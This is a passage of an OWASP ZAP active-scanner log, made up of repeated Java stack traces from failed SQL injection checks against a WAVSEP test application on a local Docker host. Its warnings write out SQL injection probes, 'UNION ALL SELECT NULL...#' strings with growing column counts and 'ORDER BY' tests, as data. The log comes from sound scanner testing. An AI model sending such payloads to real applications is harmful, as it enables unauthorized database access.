org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680972 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680972 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 9628#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 9628# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680973 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680974 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680975 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680976 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680977 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680978 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680979 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680979 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680980 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680981 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680983 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at 